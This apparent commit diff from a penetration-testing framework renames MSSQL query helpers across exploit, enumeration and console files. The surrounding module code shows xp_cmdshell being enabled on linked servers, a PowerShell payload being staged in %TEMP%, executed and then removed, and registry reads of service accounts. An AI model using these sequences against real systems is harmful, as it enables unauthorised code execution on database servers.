Rename more mssql_query calls & fix AutoRunScript for MSSQL

lib/rex/post/mssql/ui/console.rb

@@ -28,7 +28,7 @@ def initialize(session, opts={})
             # The mssql client context
             self.session = session
             self.client = session.client
-            self.cwd = session.client.mssql_query('SELECT DB_NAME();')[:rows][0][0]
+            self.cwd = session.client.query('SELECT DB_NAME();')[:rows][0][0]
             prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{cwd})%clr"
             history_manager = Msf::Config.mssql_session_history
             super(prompt, '>', history_manager, nil, :mssql)

modules/auxiliary/admin/mssql/mssql_enum.rb

@@ -706,7 +706,7 @@ def run
 SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P')
 AND SYSOBJECTS.ID = SYSPROTECTS.ID
 EOS
-    fountsp = mssql_query(query)[:rows]
+    fountsp = query(query)[:rows]
     if fountsp != nil
       fountsp.flatten!
       print_status("Stored Procedures with Public Execute Permission found:")
@@ -734,15 +734,15 @@ def run
     instances =[]
     if vernum.join != "2000"
       querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
-      instance_res = mssql_query(querykey)[:rows]
+      instance_res = query(querykey)[:rows]
       if instance_res != nil
         instance_res.each do |i|
           instances << i[0]
         end
       end
     else
       querykey = "exec xp_regread \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\', \'InstalledInstances\'"
-      instance_res = mssql_query(querykey)[:rows]
+      instance_res = query(querykey)[:rows]
       if instance_res != nil
         instance_res.each do |i|
           instances << i[1]
@@ -769,7 +769,7 @@ def run
     #---------------------------------------------------------
     # Enumerate under what accounts the instance services are running under
     print_status("Default Server Instance SQL Server Service is running under the privilege of:")
-    privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
+    privdflt = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
     if privdflt != nil
       privdflt.each do |priv|
         print_status("\t#{priv[1]}")
@@ -787,7 +787,7 @@ def run
     if instancenames.length > 1
       instancenames.each do |i|
         if i.strip != "MSSQLSERVER"
-          privinst = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows]
+          privinst = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows]
           if privinst != nil
             print_status("Instance #{i} SQL Server Service is running under the privilege of:")
             privinst.each do |p|

modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb

@@ -254,7 +254,7 @@ def check
 
     # since we need to have credentials for this vuln, we just login and run a query
     # to get the version information
-    if not (version = mssql_query_version())
+    if not (version = query_version())
       return Exploit::CheckCode::Safe
     end
     print_status("@@version returned:\n\t" + version)
@@ -277,7 +277,7 @@ def exploit
     if target.name =~ /Automatic/
       print_status("Attempting automatic target detection...")
 
-      version = mssql_query_version
+      version = query_version
       fail_with(Failure::NoAccess, "Unable to retrieve version information") if not version
 
       if (version =~ /8\.00\.194/)
@@ -379,7 +379,7 @@ def exploit
       fail_with(Failure::NoAccess, "Unable to log in!")
     end
     begin
-      mssql_query(runme, datastore['VERBOSE'])
+      query(runme, datastore['VERBOSE'])
     rescue ::Errno::ECONNRESET, EOFError
       print_error("Error: #{$!}")
     end
@@ -443,7 +443,7 @@ def mssql_encode_string(str)
   end
 
 
-  def mssql_query_version
+  def query_version
     begin
       logged_in = mssql_login_datastore
     rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
@@ -453,7 +453,7 @@ def mssql_query_version
     if !logged_in
       fail_with(Failure::NoAccess, "Invalid SQL Server credentials")
     end
-    res = mssql_query("select @@version", datastore['VERBOSE'])
+    res = query("select @@version", datastore['VERBOSE'])
     disconnect
 
     return nil if not res

modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb

@@ -256,7 +256,7 @@ def check
 
     # since we need to have credentials for this vuln, we just login and run a query
     # to get the version information
-    version = mssql_query_version
+    version = query_version
     unless version
       return Exploit::CheckCode::Safe
     end
@@ -280,7 +280,7 @@ def exploit
     if target.name =~ /Automatic/
       print_status("Attempting automatic target detection...")
 
-      version = mssql_query_version
+      version = query_version
       fail_with(Failure::NoAccess, "Unable to get version!") if not version
 
       if (version =~ /8\.00\.194/)
@@ -444,7 +444,7 @@ def mssql_encode_string(str)
   end
 
 
-  def mssql_query_version
+  def query_version
 
     delay = 5
 

modules/exploits/windows/mssql/mssql_linkcrawler.rb

@@ -169,7 +169,7 @@ def exploit
 
             # Get configuration information from the linked server
             sql = query_builder(temppath,"",0,versionQuery)
-            result = mssql_query(sql, false) if mssql_login_datastore
+            result = query(sql, false) if mssql_login_datastore
 
             # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
             if result[:errors].empty? and result[:rows] != nil then
@@ -390,13 +390,13 @@ def enable_xp_cmdshell(path,name,shelled)
     # Check if "show advanced options" is enabled
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'show advanced options'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
     saoOrig = result[:rows].pop.pop
 
     # Check if "xp_cmdshell" is enabled
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
     xpcmdOrig = result[:rows].pop.pop
 
     # Try blindly to enable "xp_cmdshell" on the linked server
@@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled)
         # Enabling show advanced options and xp_cmdshell
         execute = "sp_configure 'show advanced options',1;reconfigure"
         sql = query_builder_rpc(path,"",0,execute)
-        result = mssql_query(sql, false) if mssql_login_datastore
+        result = query(sql, false) if mssql_login_datastore
       end
 
       # Enabling xp_cmdshell
       print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
       execute = "sp_configure 'xp_cmdshell',1;reconfigure"
       sql = query_builder_rpc(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login_datastore
+      result = query(sql, false) if mssql_login_datastore
     end
 
     # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
     xpcmdNow = result[:rows].pop.pop
 
     if xpcmdNow == 1 or xpcmdOrig == 1
@@ -460,12 +460,12 @@ def enable_xp_cmdshell(path,name,shelled)
       print_status("\t - Disabling xp_cmdshell on " + name)
       execute = "sp_configure 'xp_cmdshell',0;reconfigure"
       sql = query_builder_rpc(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login_datastore
+      result = query(sql, false) if mssql_login_datastore
     end
     if saoOrig == 0 and xpcmdNow == 1
       execute = "sp_configure 'show advanced options',0;reconfigure"
       sql = query_builder_rpc(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login_datastore
+      result = query(sql, false) if mssql_login_datastore
     end
   end
 
@@ -510,19 +510,19 @@ def powershell_upload_exec(path)
     mytext_64.scan(/.{1,2500}/).each {|part|
       execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
       sql = query_builder(path,"",0,execute)
-      result = mssql_query(sql, false) if mssql_login_datastore
+      result = query(sql, false) if mssql_login_datastore
       linenum = linenum+1
     }
 
     # Remove duplicate lines from temp file and write to new file
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
 
     # Remove tracking tags from lines
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
 
     # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
     # If running on 64bit system, 32bit powershell called from syswow64
@@ -538,10 +538,10 @@ def powershell_upload_exec(path)
 
     # Execute the playload
     print_status("Executing payload...")
-    result = mssql_query(sql, false) if mssql_login_datastore
+    result = query(sql, false) if mssql_login_datastore
     # Remove payload data from the target server
     execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
     sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql,false)
+    result = query(sql,false)
   end
 end

modules/exploits/windows/mssql/mssql_payload.rb

@@ -73,7 +73,7 @@ def check
       return Exploit::CheckCode::Detected
     end
 
-    mssql_query("select @@version", true)
+    query("select @@version", true)
     if mssql_is_sysadmin
       vprint_good "User #{datastore['USERNAME']} is a sysadmin"
       Exploit::CheckCode::Vulnerable

spec/lib/msf/base/sessions/mssql_spec.rb

@@ -31,7 +31,7 @@
     allow(user_input).to receive(:intrinsic_shell?).and_return(true)
     allow(user_input).to receive(:output=)
     allow(client).to receive(:sock).and_return(rstream)
-    allow(client).to receive(:mssql_query).and_return(query_result)
+    allow(client).to receive(:query).and_return(query_result)
     allow(rstream).to receive(:peerinfo).and_return(peer_info)
   end